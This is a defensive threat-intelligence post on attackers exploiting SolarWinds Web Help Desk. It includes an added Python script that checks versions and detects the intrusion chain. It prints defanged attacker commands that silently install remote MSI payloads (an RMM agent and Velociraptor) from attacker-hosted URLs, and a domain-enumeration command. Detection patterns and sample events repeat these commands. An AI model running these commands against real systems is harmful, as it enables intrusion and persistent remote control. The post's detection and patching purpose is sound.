Active Exploitation of SolarWinds Web Help Desk

Published: February 8, 2026
By: Anna Pham, John Hammond, Jamie Levy

Acknowledgments: Special thanks to Dipo Rodipe, Dray Agha, and Lindon Wass for their contributions to this investigation and write-up.

TL;DR: Huntress has observed threat actors exploiting a SolarWinds Web Help Desk vulnerability at 3 customers; organizations should apply the update from SolarWinds' website as soon as possible.

Background

On February 7, 2026, Huntress SOC analyst Dipo Rodipe investigated a case of SolarWinds Web Help Desk exploitation in which the threat actor rapidly deployed Zoho Meetings and Cloudflare tunnels for persistence, and Velociraptor for command and control. This intrusion stemmed from the many recently disclosed vulnerabilities affecting SolarWinds WHD. The most critical of these grant an adversary arbitrary code execution via untrusted deserialization: CVE-2025-40551 was recently added to CISA's Known Exploited Vulnerabilities catalog, and CVE-2025-26399 was just discussed by Microsoft and other vendors who have also observed active in-the-wild exploitation.

All versions of SolarWinds Web Help Desk prior to 12.8.7 HF1 are affected. You can find the installed version of SolarWinds WHD at this path: C:\Program Files\WebHelpDesk\version.txt

Figure 1: A view of SolarWinds Web Help Desk

Across our partner base, Huntress protects 84 endpoints across 78 organizations using SolarWinds Web Help Desk.

Video transcript:

Have you heard the news about SolarWinds Web Help Desk being actively exploited? I cannot wait to tell you about all the tradecraft. So after getting remote code execution, the threat actor drove Velociraptor as a C2 framework. And Velociraptor is a well-known DFIR tool that some of you might have used before in the past. But here is where things get really interesting.
So the threat actor spun up their own Elastic Cloud instance and started shipping system information from compromised endpoints right into it. They literally built a whole SOC dashboard to manage their own victims at scale. Using our own defender tools against us? Nice try.

Huntress observations

Zoho Assist, but make it malicious

Huntress observed active post-exploitation activity stemming from this compromised SolarWinds Web Help Desk (WHD) instance. The attack chain originated from wrapper.exe, the WHD service wrapper, which spawned java.exe, the underlying Tomcat-based WHD application. The Java process then launched cmd.exe to silently install a remote MSI payload via this command:

msiexec /q /i hxxps://files.catbox[.]moe/tmp9fc.msi

The adversary used the file-hosting service Catbox to stage a Zoho ManageEngine RMM agent, a legitimate remote management tool that threat actors abuse to maintain persistent, hands-on access to a compromised environment. This activity aligns with Microsoft's February 6 advisory on active exploitation of SolarWinds Web Help Desk, confirming that threat actors are weaponizing WHD vulnerabilities to achieve remote code execution and deploy additional tooling in victim environments.

Interestingly, the Zoho Assist agent was configured for unattended access, registering the compromised host to a Zoho Assist account tied to a Proton Mail address, esmahyft@proton[.]me.

Once the RMM agent was established, the threat actor wasted no time pivoting to hands-on-keyboard activity. Using the RMM agent process (TOOLSIQ.EXE) as their operational foothold, they ran Active Directory discovery to enumerate domain-joined machines via:

net group "domain computers" /do

This is textbook reconnaissance aimed at identifying viable targets for lateral movement; the /do switch is an abbreviation of /domain, so the query is answered by a domain controller rather than the local SAM.
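Two host-level checks fall out of the write-up so far: a version gate for C:\Program Files\WebHelpDesk\version.txt against the 12.8.7 HF1 fixed build, and a hunt over process-creation events for the chain described above (java.exe under WHD spawning a shell, msiexec installing a package straight from a URL, and domain enumeration launched from the RMM agent process). The following Python is an added example written for this page, not Huntress tooling and not code from the original post; the wording of version.txt, the ProcEvent schema, and the sample events (including the placeholder Java and TOOLSIQ.EXE paths) are constructed assumptions.

```python
"""Added triage helpers for the SolarWinds Web Help Desk (WHD) intrusion
described in the post. Not Huntress code; the version.txt wording, the
process-event schema and the sample events below are assumptions."""
import re
from dataclasses import dataclass

# First fixed build named in the post is 12.8.7 HF1; the hotfix level is
# carried as a fourth component so 12.8.7 (no hotfix) sorts as vulnerable.
FIXED_BUILD = (12, 8, 7, 1)


def parse_whd_version(text: str) -> tuple:
    """Parse strings such as '12.8.7', '12.8.7 HF1' or '12.8.6 Hotfix 2'.
    Assumes version.txt holds a dotted version with an optional hotfix tag."""
    m = re.search(r"(\d+)\.(\d+)\.(\d+)(?:\s*(?:HF|Hotfix)\s*(\d+))?", text, re.I)
    if not m:
        raise ValueError(f"unrecognised WHD version string: {text!r}")
    major, minor, patch, hotfix = m.groups()
    return int(major), int(minor), int(patch), int(hotfix or 0)


def whd_needs_update(version_text: str) -> bool:
    """True when the installed build predates 12.8.7 HF1."""
    return parse_whd_version(version_text) < FIXED_BUILD


@dataclass
class ProcEvent:
    """Minimal process-creation record (Sysmon Event ID 1 / Security 4688 style)."""
    image: str          # path of the new process
    command_line: str
    parent_image: str   # path of the process that spawned it


# msiexec installing a package straight from a URL; defanged hxxp(s) is accepted
# so IOCs copied from reports can be replayed through the rule unchanged.
REMOTE_MSI = re.compile(r"msiexec(?:\.exe)?\s.*?/i\s+(?:https?|hxxps?)://", re.I)
# 'net group "domain computers" /do' (/do is an abbreviation of /domain)
DOMAIN_RECON = re.compile(r'net1?(?:\.exe)?\s+group\s+"?domain computers"?\s+/do', re.I)
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
RMM_AGENTS = {"toolsiq.exe"}  # Zoho Assist unattended-access process from the post


def _basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def find_whd_exploitation(events):
    """Return (rule, command_line) pairs for events matching the observed chain."""
    hits = []
    for ev in events:
        image, parent = _basename(ev.image), _basename(ev.parent_image)
        # Tomcat-hosted WHD (java.exe under wrapper.exe) has no business spawning a
        # shell. Scope further by install path (parent_image) if other Java apps are noisy.
        if parent == "java.exe" and image in SHELLS:
            hits.append(("whd_java_spawned_shell", ev.command_line))
        if REMOTE_MSI.search(ev.command_line):
            hits.append(("msiexec_remote_package", ev.command_line))
        if parent in RMM_AGENTS and DOMAIN_RECON.search(ev.command_line):
            hits.append(("rmm_domain_recon", ev.command_line))
    return hits


# Constructed sample events modelled on the chain in the write-up; the Java and
# TOOLSIQ.EXE paths are placeholders, not paths taken from the investigation.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Program Files\WebHelpDesk\bin\jre\bin\java.exe",
              "java.exe (WHD Tomcat service, constructed command line)",
              r"C:\Program Files\WebHelpDesk\bin\wrapper.exe"),
    ProcEvent(r"C:\Windows\System32\cmd.exe",
              "cmd.exe /c msiexec /q /i hxxps://files.catbox[.]moe/tmp9fc.msi",
              r"C:\Program Files\WebHelpDesk\bin\jre\bin\java.exe"),
    ProcEvent(r"C:\Windows\System32\msiexec.exe",
              "msiexec /q /i hxxps://files.catbox[.]moe/tmp9fc.msi",
              r"C:\Windows\System32\cmd.exe"),
    ProcEvent(r"C:\Windows\System32\net.exe",
              'net group "domain computers" /do',
              r"C:\placeholder\TOOLSIQ.EXE"),
    ProcEvent(r"C:\Windows\System32\msiexec.exe",  # benign local install, no hit
              r"msiexec /i C:\Temp\vendor.msi /qn",
              r"C:\Windows\explorer.exe"),
]

if __name__ == "__main__":
    for v in ("12.8.7", "12.8.7 HF1"):
        print(f"{v}: {'UPDATE' if whd_needs_update(v) else 'fixed'}")
    for rule, cmd in find_whd_exploitation(SAMPLE_EVENTS):
        print(f"{rule:26} {cmd}")
```

The cmd.exe event fires two rules (shell under java.exe, and the remote msiexec in its command line) and the child msiexec.exe fires the second again, which is the intended behaviour: each rule is independent so a partial log (only 4688, no parent path) still surfaces the URL-sourced MSI. Feed real events by mapping your EDR or Sysmon fields onto ProcEvent.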
Figure 2: Huntress detection of the remote MSI payload delivery spawned from the WHD service process and of domain reconnaissance spawned from the RMM agent (TOOLSIQ.EXE)

Shortly after the initial reconnaissance, the threat actor used the Zoho Assist remote session to deploy Velociraptor, a legitimate open-source digital forensics and incident response (DFIR) tool, to the compromised host. The installation was again a silent MSI execution, this time pulling the installer from an attacker-controlled Supabase storage bucket:

msiexec /q /i hxxps://vdfccjpnedujhrzscjtq.supabase[.]co/storage/v1/object/public/image/v4.msi

Who's running Velociraptor? Not the Blue Team.

While Velociraptor is designed to help defenders with endpoint monitoring and artifact collection, its capabilities (remote command execution, file retrieval, and process execution via VQL queries) make it equally effective as a C2 framework when pointed at attacker-controlled infrastructure. The recovered Velociraptor client configuration file had some interesting components:

(Velociraptor configuration excerpt, embedded on the original page as a Gist)

This demonstrates the adversary using Velociraptor version 0.73.4, a known outdated version of Velociraptor with a privilege escalation vul